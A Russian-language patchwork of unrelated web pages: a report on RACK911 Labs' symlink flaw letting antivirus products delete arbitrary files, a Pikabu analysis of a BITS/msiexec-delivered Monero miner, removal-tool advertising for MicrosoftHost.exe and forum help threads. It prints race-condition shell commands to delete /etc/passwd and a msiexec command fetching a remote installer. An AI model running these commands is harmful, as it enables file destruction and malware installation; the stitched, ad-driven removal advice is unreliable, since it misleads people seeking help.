Для проведения атаки необходимо загрузить файл, который антивирус распознает как вредоносный (например, можно использовать тестовую сигнатуру), а через определённое время, после выявления вредоносного файла антивирусом, но непосредственно перед вызовом функции для его удаления, подменить каталог с файлом символической ссылкой. В Windows для достижения того же эффекта выполняется подмена каталога при помощи точки соединения (directory junction). Проблема в том, почти все антивирусы должным образом не выполняли проверку символических ссылок и, считая что удаляют вредоносный файл, удаляли файл в каталоге на который указывает символическая ссылка.

В Linux и macOS показано как таким способом непривилегированный пользователь может удалить /etc/passwd или любой другой системный файл, а в Windows DDL-библиотеку самого антивируса для блокирования его работы (в Windows атака ограничена только удалением файлов, которые в текущим момент не используются другими приложениями). Например, атакующий может создать каталог «exploit» и загрузить в него файл EpSecApiLib.dll с тестовой сигнатурой вируса, после чего перед удалением заменить каталог «exploit» на ссылку «C:\Program Files (x86)\McAfee\Endpoint Security\Endpoint Security Platform», что приведёт к удалению библиотеки EpSecApiLib.dll из каталога антивируса. В Linux и macos аналогичный приём можно проделать с подменой каталога на ссылку «/etc».

rm -rf /home/user/exploit ; mkdir /home/user/exploit/

while inotifywait -m “/home/user/exploit/passwd” | grep -m 5 “OPEN”

rm -rf /home/user/exploit ; ln -s /etc /home/user/exploit

Более того, во многих антивирусах для Linux и macOS было выявлено использование предсказуемых имён файлов при работе с временным файлами в каталоге /tmp и /private/tmp, что могло использоваться для повышения привилегий до пользователя root.

К настоящему времени проблемы уже устранены большинством поставщиков, но примечательно, что первые уведомления о проблеме были направлены производителям ещё осенью 2018 года. Несмотря на то, что не все производители выпустили обновления, им было дано на исправление как минимум 6 месяцев, и RACK911 Labs считает, что теперь вправе раскрыть сведения об уязвимостях. Отмечается, что компания RACK911 Labs давно занимается работой по выявлению уязвимостей, но она не предполагала, что с коллегами из антивирусной индустрии будет так трудно работать из-за затягивания выпуска обновлений и игнорирования необходимости срочного устранения проблем с безопасностью.

Продукты, подверженные проблеме (свободный антивирусный пакет ClamAV в списке отсутствует):

Comodo Endpoint Security

Eset File Server Security

F-Secure Linux Security

Kaspersy Endpoint Security

McAfee Endpoint Security

Sophos Anti-Virus for Linux

Avast Free Anti-Virus

Avira Free Anti-Virus

Comodo Endpoint Security

F-Secure Computer Protection

FireEye Endpoint Security

Intercept X (Sophos)

Kaspersky Endpoint Security

Malwarebytes for Windows

McAfee Endpoint Security

Webroot Secure Anywhere

BitDefender Total Security

Eset Cyber Security

Kaspersky Internet Security

McAfee Total Protection

Microsoft Defender (BETA)

Webroot Secure Anywhere

Криптоджекинг. Разбор случайного вируса-майнера под Windows.⁠ ⁠

Как-то раз на неделе обратился ко мне коллега из офиса, говорит, что его домашний компьютер вдруг начинает жутко лагать, самопроизвольно перезагружается, и т.п.
Я взялся посмотреть, что же это было.
Первым делом была проверена автозагрузка процессов и служб, как обычно делает большинство «мастеров», думая, что они при отключении там чего-либо полностью излечили компьютер от вирусов. Может быть раньше, со всякими WinLocker’ами или рекламными баннерами этот трюк и прокатывал, но времена меняются, и теперь технологии другие. В винде любых версий есть старые дыры, но вполне функциональные. Итак, первое, что видно при включении ЭВМ — открывается вот такое вот окошко (скрин не было сделать возможности с него, звиняйте, скрины пойдут дальше):

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

В автозагрузке, повторюсь всё в порядке:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

После того, как компьютер был штатно заштопан двумя разными антивирусами, возникла идея исследовать этот файл, который система начала загружать. Но не всё оказалось так просто.
Итак, дальше расписано по шагам, каким образом работает этот вирус, и к какому конечному результату это приводит.

Шаг 0. Попадание первичного файла в систему.
Для того, чтобы в системе MS Windows инициировался какой-либо процесс, что-то должно его запускать. В первых версиях вирусов — ярлык вируса просто кидался в папку автозагрузки программ, в Windows 7 она находится по адресу:
%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
Потом вирусы стали добавляться в ветви реестра [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] и то же самое в разделе HKEY_LOCAL_MACHINE, откуда удалить их было уже не так просто. Но оказалось, что в автозагрузку эти файлы можно и не добавлять, чтобы не провоцировать простенькие антивирусы. В системе существует «Планировщик заданий» (mmc.exe), куда прекрасно можно добавить задачу автозапуска какой-либо программы, и даже целую исполняемую часть командной строки (сценарий):

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

В таком случае на действия начинают реагировать лишь единицы антивирусов, никакие а**сты, макаффи и т.п. фри версии антивирей туда по большей части даже не суются.
Итак, я попытался зайти на тот адрес из окна (http://f******r.com/) в веб-браузере. Но, попробовав ввести тот адрес, да и вообще, какой бы адрес я не открывал, я получал заглушку на nginx:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Дальше я стал копать и выяснил, что бирюзовое окно — это рабочее окно системы BITS (Background Intelligent Transfer Service). Изначально он предназначен для быстрой передачи данных по специальному протоколу через команды приложений. Как оказалось, именно этот протокол (с 2016 года, по версии xakep.ru) стал часть использоваться для загрузки вирусов. Поэтому я подключился через этот протокол, используя команды PowerShell по оригинальному адресу:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

И, вуаля, я получил какой-то файл, весом гораздо больше пустой веб-страницы:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Видимо, на сервере специальным образом настроены порты, чтобы при обращении именно от BITS был отправлен экземпляр этого файла. При этом, как выяснилось, неважно, какое название у архива — всегда будет получен тот же файл. Давайте исследуем его.
Шаг 1: Первичный файл загружен. Что это?
Я открыл файл в Hex-редакторе, чтобы распознать тип. Начинается он с MZP, значит файл исполняемый. В файле была обнаружена сигнатура Inno Setup, стало ясно, что это — файл инсталлятора чего-либо:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Шаг 2. Вместо установки этого файла я воспользовался утилитой Inno Unpacker, которая дала мне следующие файлы, содержащиеся внутри проекта:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Собственно, как оказалось, программа никаких файлов в себе не содержала — только скрипт install_script с описанием установщика, а так же скомпилированный фрагмент кода, выполненного на паскале. Вот файл скрипта:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Обратите внимание на параметры [Setup], а именно название программы, и выходное имя файла OutputBasenameFile (оно совпадает кое с чем на первой картинке).
Шаг 3. Также неизвестным оставался код программы CompiledCode.bin. Для того, чтобы расшифровать его, я воспользовался декомпилятором паскаль-фрагмента кода:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Шаг 4. Стало ясно, что данные внутри кода немного зашифрованы (обфусцированы) от посторонних глаз. Немного видоизменив код, я интерпретировал его на FreePascal’е, и получил следующий результат:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Собственно, здесь можно видеть копии команд, выполняемых в Windows через cmd shell. Здесь указана команда на мгновенную перезагрузку (скорее всего, отключает антивирус: во время выключения все программы закрываются, но сам код успевает исполнится, таким образом простые антивирусы не обнаружат загрузки кода). Зачем предназначена 5 строка (пингует локалхост), я точно не знаю — скорее всего это какие-то внутренние операции для работы вируса. Программа также передаёт на сервер данные о системе, её разрядности, производительности и т.п. отдельным потоком, это можно видеть в коде, но эту часть я вырезал из-за сложности интерпретации.
Подробно нас интересует четвертая строчка: что такое msiexec?
Шаг 5. Загрузка главного инсталлятора. Распаковка.
Для тех, кто слышит об этом в первый раз — да, не удивляйтесь. Вбив в командную строку такую команду: msiexec.exe /q /i (веб-адрес), начнется немедленная, скрытая и невидимая установка исполняемого кода с удаленного адреса в систему, если инсталлятор и скрипт собран в формате msi. Файл может даже не иметь сертификата подписи. В файле могут исполняться любые команды по созданию, перемещению, переименованию файлов внутри системы, добавления их в реестр и запуск. Зачем это было добавлено? Именно через эту подпрограмму система загружает обновления. Ничего не мешает закинуть туда свои скрипты и файлы.
Ситуация такая же, как и с первым файлом — если открыть этот сайт по http, он выдаёт заглушку массой в 233 байта. Если же обратиться по любому адресу через msiexec, то сервер посылает очередной архив, весом в 2,9 Мб. Скорее всего, это вызвано определенным использование портов и специальных команд системы. Но сайт в этот раз уже другой. Это может быть одно из сотен зеркал, все настроены одинаково — обратившись по новому домену через оригинальный BITS я получил файл, весом в 328 Кб, т.е. файл с паскалем. И наоборот.
Давайте посмотрим, что внутри инсталлятора, для этого распакуем его при помощи 7-zip как обычный архив:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Внутри инсталлятора (MSICEE2.msi) оказались два файла: unzip.exe и vcruntime140.lib.zip. Во втором архиве ещё два файла, но он запаролен. Для начала я исследовал файл unzip.exe:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Оказалось, что этот файл является неизмененной копией утилиты для систем Windows 2005 года, которая называется «Info-Zip UnZip», и являющейся простым распаковщиком zip-файлов. Вот, что будет, если её запустить:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Несмотря на древность, применение этой утилиты здесь оправдано, далее расскажу, почему именно. Итак, осмотрев файлы мы зашли в тупик — что делать? Программа изучена, а второй архив запаролен. Но при помощи архиватора 7-zip мы не смогли извлечь установочный скрипт из MSI-файла. Пришлось запустить этот инсталлятор на виртуальной машине с логгированием: такой командой: msiexec.exe /i http://revir.i********s.info/yskwozrivwuwc.txt /L*V log.txt
После чего из машины был вытащен лог установки, размером в 140кб. Пройдусь по его ключевым моментам:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Шаг 6. В одной из строчек виден пароль от архива: IBM644. Но обычный архиватор этот пароль не принимает — распаковываются файлы только оригинальным UnZip’ом при помощи этой команды.
Все файлы внутри архива — исполняемые библиотеки для системы типа dll или lib. Написаны они на C, декомпилировать их я смысла не видел. Возможно, именно в них содержится блок, занимающийся копированием вируса в системе, но так глубоко я их не копал. В песочнице после их регистрации в системе (папка TEMP) появился следующий файл: [612A9A]. Смотрим, что у него внутри:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Этот файл представляет собой json — конфиг, в котором видно ключевое слово CryptoNight и URL, логин и пароль от майнинг-сервера. Данный майнер майнит монету «Monero». Данный файл подозрительно совпадает с конфиг-файлом для Windows-версии майнера «****Rig»:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Скормив этот конфиг исполняемому файлу майнера (оконной версии), загруженному из интернета, действительно компьютер получил настоящую «работу», и видео при этом стало жутко лагать. В оригинальном конфиге прописано также исполнение без gui (фоновым процессом — никаких окон).

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Собственно, это и есть конечный результат. Помайнил 10 секунд для него, чтобы сделать вам скрин, надеюсь, что вырученных за это время денег автору хватит как минимум на два билета до Канарских островов. Итого имеем сложный файл, прописывающий себя в нескольких местах системы, работающий на языках Pascal и C++, в итоге приводящий к запланированному запуску майнера. Берегите свои компьютеры. С вами был Kekovsky, специально для pikabu.

Microsofthost exe как удалить windows 10

Большинство антивирусных программ распознает MicrosoftHost.exe как вирус, например, Kaspersky определяет файл как HEUR:Trojan.Win32.Miner.gen, и Symantec определяет файл как Trojan.Gen.2.
Бесплатный форум с информацией о файлах поможет вам найти информацию, как удалить файл. Если вы знаете что-нибудь об этом файле, пожалуйста, оставьте комментарий для других пользователей.

Вот так, вы сможете исправить ошибки, связанные с MicrosoftHost.exe

Информация о файле MicrosoftHost.exe

Процесс NT Kernel & System принадлежит программе MicrosoftHost от Microsoft (www.microsoft.com).

Описание: MicrosoftHost.exe не является важным для Windows и часто вызывает проблемы. MicrosoftHost.exe находится в подпапках «C:\Program Files». Известны следующие размеры файла для Windows 10/8/7/XP 1,100,288 байт (28% всех случаев), 891,904 байт, 2,647,040 байт, 2,078,208 байт или 2,905,088 байт.
У процесса нет видимого окна. Процесс использует порт, чтобы присоединится к сети или интернету. Это не файл Windows. MicrosoftHost.exe способен мониторить приложения и манипулировать другими программами. Поэтому технический рейтинг надежности 83% опасности.

Важно: Вы должны проверить файл MicrosoftHost.exe на вашем компьютере, чтобы убедится, что это вредоносный процесс. Мы рекомендуем Security Task Manager для безопасности вашего компьютера.

Комментарий пользователя

Лучшие практики для исправления проблем с MicrosoftHost

Чистый и аккуратный компьютер является ключевым требованием для избежания проблем с ПК. Это означает: проверка на наличие вредоносных программ, очистка жесткого диска, используя cleanmgr и sfc /scannow, удаление программ, которые вам больше не нужны, проверка Автозагрузки (используя msconfig) и активация Автоматического обновления Windows. Всегда помните о создании периодических бэкапов, или как минимум о создании точек восстановления.

Если у вас актуальная проблема, попытайтесь вспомнить последнее, что вы сделали, или последнюю программу, которую вы установили, прежде чем проблема появилась первый раз. Используйте resmon команду, чтобы определить процесс, который вызывает у вас проблему. Даже если у вас серьезные проблемы с компьютером, прежде чем переустанавливать Windows, лучше попробуйте восстановить целостность установки ОС или для Windows 8 и более поздних версий Windows выполнить команду DISM.exe /Online /Cleanup-image /Restorehealth. Это позволит восстановить операционную систему без потери данных.

MicrosoftHost сканер

Microsofthost exe как удалить windows 10

Security Task Manager показывает все запущенные сервисы Windows, включая внедренные скрытые приложения (например, мониторинг клавиатуры или браузера, авто вход). Уникальный рейтинг надежности указывает на вероятность того, что процесс потенциально может быть вредоносной программой-шпионом, кейлоггером или трояном.

Бесплатный aнтивирус находит и удаляет неактивные программы-шпионы, рекламу, трояны, кейлоггеры, вредоносные и следящие программы с вашего жесткого диска. Идеальное дополнение к Security Task Manager.

Reimage бесплатное сканирование, очистка, восстановление и оптимизация вашей системы.

вирус Microsoft host.exe (пробела нет между майкрософт и хост)

Зловред — это программа или расширение для браузеров, который, пользуясь невнимательностью пользователя, может проникать в операционную систему и менять настройки в вашем браузере.
Из самых популярных совершаемых действий можно выделить:

установка расширений в браузеры;
подмена стартовой страницы;
подмена поисковой системы;
подмена ярлыков браузеров;
внедрение баннеров и js скриптов на страницы сайтов;
отключение обновлений браузеров;
установка «своего» браузера по умолчанию;
установка ПО, настойчиво требующего оплаты какого-то непонятного функционала;
установка freemium игр без спроса пользователя;
установка своих драйверов в систему для перехвата и модификации трафика.
Бороться с таким софтом, как microsofthost exe, помогает Чистилка.

Как закрыть microsofthost exe

Шаг 1. Скачайте программу «Чистилка» (красная кнопка слева)

Шаг 2. Запустите программу «Чистилка» (скачанный файл chistilka.exe)

Шаг 3. Выбрав объекты для удаления, для полного избавления от зловреда microsofthost exe нажимаем кнопку «Обезвредить».

Шаг 4. Поздравляем, ваш компьютер чист!
Чистилка — совершенная защита от мусорного и ненужного ПО, которое проникает в ваш компьютер через нежелательные программы и рекламные объявления.
Надежная защита от всех вредоносных программ. Чистилка находит и удаляет вредоносные трояны, черви и шпионы.
Чистилка быстро избавит ваш компьютер от надоедливой рекламы и увеличит скорость работы Windows.

Майнер microsofthost.exe

Подозрительные файлы UVS.TXT (2.5 Кб, 12 просмотров)
DESKTOP-T2NHHHV_2020-06-14_00-17-05_v4.1.7z (761.3 Кб, 7 просмотров)

Microsofthost exe как удалить windows 10Майнер MicrosoftHost.exe и AppModule.exe. UVS логи
Здравствуйте, господа погроммисты! Сегодня наткнулся на такую х. плохую вещь на своем.

Microsofthost exe как удалить windows 10Кажется словил майнер microsofthost.exe
Ситуация такая: по работе нужен был фотошоп. Скачал. Установил. Сам фотошоп рабочий, только вот.

Microsofthost exe как удалить windows 10Словил майнер microsofthost.exe, UVS лог
Здравствуйте, прошаренные люди Пошарился по форумам, увидел у людей такую же проблему, мол, 100%.

Словил майнер microsofthost.exe, UVS лог есть
Здравствуйте, прошаренные люди Пошарился по форумам, увидел у людей такую же проблему, мол, 100%.

Первое сообщение получилось неинформативным, извиняюсь.

Попробовал собрать логи логгером из этой темы, он запускается, но закрывается то на открытии IE, то чуть погодя.

Всё это время вирус продолжал работать. При открытии диспетчера задач использование им ЦП падает за секунду в три-четыре раза. Если оставлять диспетчер запущенным, то где-то через минуту он закрывается и производительность пк ощутимо падает, полагаю, что майнер включается обратно.
Процесс NT Kernel & System ест кучу ЦП только когда я долго не запускаю диспетчер.

Дополнительно просканировал с помощью UnHackMe, он пометил зараженными следующие файлы:

Но вылечить он ничего не смог, после перезагрузки ПК он выявляет всё те же файлы. Папки Windowstask в програмдате вообще не вижу.

Все логи прикрепляю.

ManualCollectionLog.zip (118.0 Кб, 3 просмотров)

На всякий случай сделал новый образ автозапуска UVS, мало ли что там UnHackMe наделал. К сожалению не могу загрузить через UVS на вирустотал ни один подозрительный файл, UVS возвращает 403 ошибку.

На сайт Dr,Web смог зайти без проблем после того как еще вчера AdwCleaner очистил мне hosts.

DESKTOP-T2NHHHV_2020-06-14_15-56-32_v4.1.7z (807.4 Кб, 2 просмотров)
Подозрительные файлы UVS.TXT (2.3 Кб, 1 просмотров)

Соберите новый лог uVS.

DESKTOP-T2NHHHV_2020-06-14_17-38-18_v4.1.7z (790.1 Кб, 5 просмотров)

Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.

Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt и Addition.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.
(Если не помещаются, упакуйте).
Подробнее читайте в этом руководстве.

Добавлено через 1 минуту
Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.

Поймал майнер MicrosoftHost.exe (XMRig)

В системе прописался майнер XMRig, скорее всего, после установки одной из пиратских игр. Не пускает на сайты лечащих утилит, роняет браузер при открытии раздела «Лечение» на форуме и самоустраняется при открытии виндового диспетчера задач.

Архив с логами прикрепляю. Надеюсь на помощь и всем желаю здоровья!

CollectionLog-2022.01.31-13.23.zip (84.3 Кб, 4 просмотров)

Поймал Майнер MicrosoftHost, как удалить?
Здравствуйте! Пошарился по форумам, увидел у людей такую же проблему, мол, 100% процессора жрет.

Решение

Скачайте AV block remover.
Распакуйте, запустите и следуйте инструкциям. Если не запускается, переименуйте файл AVbr.exe в, например, AV_br.exe
В результате работы утилиты появится отчёт AV_block_remove_дата-время.log, прикрепите его к следующему сообщению.

После перезагрузки системы соберите новый CollectionLog Автологером.

AV_block_remove_2022.01.31-14.51.log (5.0 Кб, 3 просмотров)
CollectionLog-2022.01.31-14.56.zip (76.8 Кб, 3 просмотров)

Уже должно полегчать.

Для верности посмотрим еще такие логи:

Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Да для соглашения с предупреждением.

Нажмите кнопку Сканировать (Scan).
После окончания сканирования будут созданы отчеты FRST.txt и Addition.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.
(Если не помещаются, упакуйте в архив).
Подробнее читайте в этом руководстве.

Addition_FRST_logs.zip (23.2 Кб, 3 просмотров)
Fixlog.txt (8.3 Кб, 3 просмотров)

Если проблема решена, в завершение:

1.
Переименуйте FRST.exe (или FRST64.exe) в uninstall.exe и запустите.
Компьютер перезагрузится.

Остальные утилиты лечения и папки можно просто удалить.

вирус microsofthost.exe и его побратим appmodule.exe

вирус microsofthost.exe и его побратим appmodule.exe

Несколько дней назад мой системный блок начал достаточно сильно шуметь, при запуске системы в безопасном режиме он переставал шуметь. Шум также немедленно прекращался при открытии диспетчера задач, после непродолжительного времени он сам собой закрывался.
по логике поймал майнера, вычислил его по панели Xbox Game Bar в Windows 10
при попытке скачать и установить антивирь на примере каспера то оный вылетал после не продолжительного начала установки, также заметил что браузер тоже иной раз вылетает но закономерность не выявил

прошу помочь в удалении не новой но злостно живущей заразы)

Майнер MicrosoftHost.exe и AppModule.exe. AVZ логи
Добрый день, господа! Через System explorer наткнулся на вот это вот.

Microsofthost exe как удалить windows 10Майнер MicrosoftHost.exe и AppModule.exe. UVS логи
Здравствуйте, господа погроммисты! Сегодня наткнулся на такую х. плохую вещь на своем.

Microsofthost exe как удалить windows 10Вирусы в AppModule.exe и MicrosoftHost.exe
Антивирус Аваст начал часто блокировать эти процессы, которые заражены троянами. Никак не могу от.

Удалил не специально taskhostw.exe, winlogon.exe, microsofthost.exe и не могу зайти в учётную запись
Я искал решение одной проблемы в интернете и наткнулся на сообщение на данном сайте. Там у человека.

Microsofthost exe как удалить windows 10Вирус microsofthost.exe
В последнее время начал замечать нагрузку на процессор.Видео на ютубе стали зависать, игры.

Добавлено через 38 секунд
Ну и можете провести самодиагностику => defendium.info

CollectionLog-2021.10.13-23.30.zip (95.6 Кб, 3 просмотров)

Решение

Скачайте, распакуйте и запустите (от имени администратора) AV block remover.
По окончании всех процедур произойдет перезагрузка системы. Прикрепите созданный утилитой лог AV_block_remove.log к следующему сообщению.

Если не получится скачать, то я залил файл на файлообменник
https://mega.nz/file/H7hwGYqB#. N0eiNb6o4Q

Повторно запустите Autologger и прикрепите новый CollectionLog.

при запуске от админа:скрин
после переименования запустился
после перезагрузки процес microsofthost.exe не запускается

перед заражением
ставил игру Mad Max Road Warrior качал через торент
и пытался востановить данные с флешки через скачанную не единыжды с разных сайтов Starus Partition Recovery также пользовал кряк на нее
данные так и не востановил а проблем нажил

AV_block_remove.log (4.9 Кб, 6 просмотров)
CollectionLog-2021.10.15-09.48.zip (88.1 Кб, 3 просмотров)

Подготовьте и прикрепите лог сканирования AdwCleaner.

удалил! (его мне ставил знакомый для активации винды)

при нажатии на ссылку не открывается лишь моргание экрана, скопировал путь ссылки, скачал.

P.S: у меня до сих пор еще выключена видовс защита и брандмаузер!

ClearLNK-2021.10.15_11.09.55.log (1.9 Кб, 4 просмотров)
AdwCleaner[S00].txt (2.1 Кб, 4 просмотров)

2.
Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Да для соглашения с предупреждением.

Удаление MicrosoftShellHost.exe CPU Miner Trojan: Удалите MicrosoftShellHost.exe CPU Miner Trojan Навсегда

MicrosoftShellHost.exe CPU Miner Trojan копирует свои файл(ы) на ваш жёсткий диск. Типичное имя файла (randomname).exe. Потом он создаёт ключ автозагрузки в реестре с именем MicrosoftShellHost.exe CPU Miner Trojan и значением (randomname).exe. Вы также можете найти его в списке процессов с именем (randomname).exe или MicrosoftShellHost.exe CPU Miner Trojan.

Если у вас есть дополнительные вопросы касательно MicrosoftShellHost.exe CPU Miner Trojan, пожалуйста, заполните эту форму и мы вскоре свяжемся с вами.

Скачать утилиту для удаления

Скачайте эту программу и удалите MicrosoftShellHost.exe CPU Miner Trojan and (randomname).exe (закачка начнется автоматически):

* SpyHunter был разработан американской компанией EnigmaSoftware и способен удалить удалить MicrosoftShellHost.exe CPU Miner Trojan в автоматическом режиме. Программа тестировалась на Windows XP, Windows Vista, Windows 7 и Windows 8.

Функции

*Удаляет все файлы, созданные MicrosoftShellHost.exe CPU Miner Trojan.

*Удаляет все записи реестра, созданные MicrosoftShellHost.exe CPU Miner Trojan.

*Программа способна защищать файлы и настройки от вредоносного кода.

*Программа может исправить проблемы с браузером и защищает настройки браузера.

*Удаление гарантированно — если не справился SpyHunter предоставляется бесплатная поддержка.

*Антивирусная поддержка в режиме 24/7 входит в комплект поставки.

Скачайте утилиту для удаления MicrosoftShellHost.exe CPU Miner Trojan от российской компании Security Stronghold

Если вы не уверены какие файлы удалять, используйте нашу программу Утилиту для удаления MicrosoftShellHost.exe CPU Miner Trojan.. Утилита для удаления MicrosoftShellHost.exe CPU Miner Trojan найдет и полностью удалит MicrosoftShellHost.exe CPU Miner Trojan и все проблемы связанные с вирусом MicrosoftShellHost.exe CPU Miner Trojan. Быстрая, легкая в использовании утилита для удаления MicrosoftShellHost.exe CPU Miner Trojan защитит ваш компьютер от угрозы MicrosoftShellHost.exe CPU Miner Trojan которая вредит вашему компьютеру и нарушает вашу частную жизнь. Утилита для удаления MicrosoftShellHost.exe CPU Miner Trojan сканирует ваши жесткие диски и реестр и удаляет любое проявление MicrosoftShellHost.exe CPU Miner Trojan. Обычное антивирусное ПО бессильно против вредоносных таких программ, как MicrosoftShellHost.exe CPU Miner Trojan. Скачать эту упрощенное средство удаления специально разработанное для решения проблем с MicrosoftShellHost.exe CPU Miner Trojan и (randomname).exe (закачка начнется автоматически):

Функции

*Удаляет все файлы, созданные MicrosoftShellHost.exe CPU Miner Trojan.

*Удаляет все записи реестра, созданные MicrosoftShellHost.exe CPU Miner Trojan.

*Программа может исправить проблемы с браузером.

*Иммунизирует систему.

*Удаление гарантированно — если Утилита не справилась предоставляется бесплатная поддержка.

*Антивирусная поддержка в режиме 24/7 через систему GoToAssist входит в комплект поставки.

Наша служба поддержки готова решить вашу проблему с MicrosoftShellHost.exe CPU Miner Trojan и удалить MicrosoftShellHost.exe CPU Miner Trojan прямо сейчас!

Оставьте подробное описание вашей проблемы с MicrosoftShellHost.exe CPU Miner Trojan в разделе Техническая поддержка. Наша служба поддержки свяжется с вами и предоставит вам пошаговое решение проблемы с MicrosoftShellHost.exe CPU Miner Trojan. Пожалуйста, опишите вашу проблему как можно точнее. Это поможет нам предоставит вам наиболее эффективный метод удаления MicrosoftShellHost.exe CPU Miner Trojan.

Как удалить MicrosoftShellHost.exe CPU Miner Trojan вручную

Эта проблема может быть решена вручную, путём удаления ключей реестра и файлов связанных с MicrosoftShellHost.exe CPU Miner Trojan, удалением его из списка автозагрузки и де-регистрацией всех связанных DLL файлов. Кроме того, отсутствующие DLL файлы должны быть восстановлены из дистрибутива ОС если они были повреждены MicrosoftShellHost.exe CPU Miner Trojan.

Чтобы избавиться от MicrosoftShellHost.exe CPU Miner Trojan, вам необходимо:

1. Завершить следующие процессы и удалить соответствующие файлы:

Предупреждение: вам необходимо удалить только файлы, контольные суммы которых, находятся в списке вредоносных. В вашей системе могут быть нужные файлы с такими же именами. Мы рекомендуем использовать Утилиту для удаления MicrosoftShellHost.exe CPU Miner Trojan для безопасного решения проблемы.

2. Удалите следующие папки:

3. Удалите следующие ключи и\или значения ключей реестра:

Предупреждение: Если указаны значения ключей реестра, вы должны удалить только указанные значения и оставить сами ключи нетронутыми. Мы рекомендуем использовать Утилиту для удаления MicrosoftShellHost.exe CPU Miner Trojan для безопасного решения проблемы.

Как предотвратить заражение рекламным ПО? Мы рекомендуем использовать Adguard:

4. Сбросить настройки браузеров

MicrosoftShellHost.exe CPU Miner Trojan иногда может влиять на настройки вашего браузера, например подменять поиск и домашнюю страницу. Мы рекомендуем вам использовать бесплатную функцию «Сбросить настройки браузеров» в «Инструментах» в программе Spyhunter Remediation Tool для сброса настроек всех браузеров разом. Учтите, что перед этим вам надо удалить все файлы, папки и ключи реестра принадлежащие MicrosoftShellHost.exe CPU Miner Trojan. Для сброса настроек браузеров вручную используйте данную инструкцию:

Для Internet Explorer

Если вы используете Windows XP, кликните Пуск, и Открыть. Введите следующее в поле Открыть без кавычек и нажмите Enter: «inetcpl.cpl».

Если вы используете Windows 7 или Windows Vista, кликните Пуск. Введите следующее в поле Искать без кавычек и нажмите Enter: «inetcpl.cpl».

Выберите вкладку Дополнительно

